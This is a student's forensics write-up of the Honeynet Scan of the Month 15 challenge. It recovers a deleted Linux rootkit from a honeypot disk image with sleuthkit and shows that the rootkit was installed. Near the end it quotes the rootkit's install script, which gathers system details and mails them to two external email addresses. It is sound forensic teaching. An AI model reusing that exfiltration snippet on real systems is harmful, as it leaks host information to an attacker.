In this post I’m doing an assignment given by Tero Karvinen on his Linux server course about computer forensics by solving one of the honeynet scan of the month. I’m going to do this on my desktop computer. The computer is i5-3570k (4X, 3,8GHz, 6M) 16GB RAM, 2x Asus GeForce GTX 560 TI in SLI mode. Using the ubuntu live-USB.
The assignment
The assignment is to solve the Honeynet scan of the month 15.
On 15 March. 2001, a Linux honeypot was successfully compromised, a rootkit was download to the / partition and then deleted from the system. Your mission is to find and recover the deleted rootkit. If you are not sure where to begin on conducting this forensic analysis and recover the rootkit, we highly reccommend you start with the Forensic Challenge. The steps you will have to follow for the rootkit recovery are similar to the steps discussed there. We have posted only the / partion for download to keep this challenge simple. The compressed image is 13MB, (honeynet.tar.gz) ‘MD5=0dff8fb9fe022ea80d8f1a4e4ae33e21’. Once you have downloaded, untarred, and unzipped the partition image, it will be 255 MB and the checksum should be ‘MD5=5a8ebf5725b15e563c825be85f2f852e’.
- Show step by step how you identify and recover the deleted rootkit from the / partition.
- What files make up the deleted rootkit?
Bonus Question:
Was the rootkit ever actually installed on the system? How do you know?Bonus Queston 2: (added by my teacher)
What information has the attacker left behind about himself?
Preparations
Downloading the ‘.tar.gz’. The url is on the assignment in a link, I downloaded and saved the link to desktop.
Unpacked the package with ‘tar’ (the x tells the command to unpack and the f tells the file location) [1]
tar xf honeynet.tar.gz
It unpacked a folder called ‘honeynet’ containing a ‘readme’ file and a ‘honeypot.hda8.dd’ file.
Starting the forensics
I needed to find out the files that have been deleted from the file system. To do this I used the command ‘tsk_recover’ [2]
To use the command, I needed to have the ‘sleuthkit’ installed.
sudo apt-get update sudo apt-get install sleuthkit -y
Then to work:
mkdir deleted tsk_recover honeypot.hda8.dd deleted/
I found out a tar gz file called ‘lk.tgz’, which I suspected to be the rootkit because of its size and because it was a package, also there was no other file that looked anything like one. I unpacked it with ‘tar’.
tar xf lk.tgz
This unpacked a folder called ‘last’. Containing a list of files with some of them having a familiar name.
drwxr-xr-x 2 xubuntu xubuntu 500 Feb 26 2001 ./ drwxrwxr-x 5 xubuntu xubuntu 120 Sep 16 10:44 ../ -rwxr-xr-x 1 xubuntu xubuntu 1345 Sep 9 1999 cleaner* -rwxr-xr-x 1 xubuntu xubuntu 19840 Feb 26 2001 ifconfig* -rw-r--r-- 1 xubuntu xubuntu 3278 Jan 27 2001 inetd.conf -rwx------ 1 xubuntu xubuntu 3713 Mar 3 2001 install* -rwxr-xr-x 1 xubuntu xubuntu 4620 Feb 26 2001 last.cgi* -rwx------ 1 xubuntu xubuntu 7165 Feb 26 2001 linsniffer* -rwx------ 1 xubuntu xubuntu 75 Feb 26 2001 logclear* -rwxr-xr-x 1 xubuntu xubuntu 79 Feb 26 2001 lsattr* -rwxr-xr-x 1 xubuntu xubuntu 632066 Feb 26 2001 mkxfs* -rwxr-xr-x 1 xubuntu xubuntu 35300 Feb 26 2001 netstat* -rw-r--r-- 1 xubuntu xubuntu 1 Feb 26 2001 pidfile -rwxr-xr-x 1 xubuntu xubuntu 33280 Feb 26 2001 ps* -rw-r--r-- 1 xubuntu xubuntu 708 Mar 3 2001 s -rwxr-xr-x 1 xubuntu xubuntu 4060 Feb 26 2001 sense* -rw-r--r-- 1 xubuntu xubuntu 11407 Jan 27 2001 services -rwx------ 1 xubuntu xubuntu 8268 Feb 26 2001 sl2* -rwxr-xr-x 1 xubuntu xubuntu 611931 Feb 8 2002 ssh* -rw-r--r-- 1 xubuntu xubuntu 880 Oct 22 2000 ssh_config -rw-r--r-- 1 xubuntu xubuntu 688 Feb 26 2001 sshd_config -rw------- 1 xubuntu xubuntu 540 Oct 22 2000 ssh_host_key -rw-r--r-- 1 xubuntu xubuntu 344 Oct 22 2000 ssh_host_key.pub -rw------- 1 xubuntu xubuntu 512 Oct 22 2000 ssh_random_seed -rwxr-xr-x 1 xubuntu xubuntu 53588 Feb 26 2001 top*
The folder contains two most important files, ‘install’ and ‘cleaner’. The attacker ran the ‘install’ script, which installs the rootkit. After that the cleaner script removes lines from log files to clean up traces of the attacker.
Was the rootkit installed on the system?
Yes. Here’s how I found out:
I needed to mount the DD file to better read its contents. [3]
mkdir sda1 sudo mount -o "loop,nodev,noexec,ro" honeypot.hda8.dd sda1/
The option ‘-o’ gives us the ability to add options to the mount. Here, we gave four options:
- ‘loop’: lets us treat the file like a block device to allow us to interact with the file system as it were mounted as a device [4]
- ‘nodev’: it does not interpret character or block special devices on the file system
- ‘noexec’: does not allow direct execution of any binaries on the mounted file system
- ‘ro’: mount the filesystem as read-only
Now to see if the rootkit had modified the files inside the file image, for example the ‘netstat’ file:
sda1/bin$ ll | grep "netstat" -rwxr-xr-x 1 root root 35300 Feb 26 2001 netstat*
Here’s the information again of the rootkit’s own netstat file:
honeynet/deleted/last$ ll | grep "netstat" -rwxr-xr-x 1 xubuntu xubuntu 35300 Feb 26 2001 netstat*
It’s clearly a match, which tells us that the rootkit was installed on the system.
What information the attacker left about himself?
I noticed, that the attacker is or at leasts speaks Romanian, because many of the files were written in the language. Also, the attacker has set the install script to mail himself the information about the computer.
echo "* Info : $(uname -a)" >> computer echo "* Hostname : $(hostname -f)" >> computer echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer echo "* Uptime : $(uptime)" >> computer echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer echo "* Spatiu Liber: $(df -h)" >> computer echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog " cat computer | mail -s "placinte" last@linuxmail.org cat computer | mail -s "roote" bidi_damm@yahoo.com
Seeing from this, he is probably the owner of the e-mails ‘last@linuxmail.org’ and ‘bidi_damm@yahoo.com’.
Sources
[2][3] Tero Karvinen ‘tsk_recover’, ‘mount’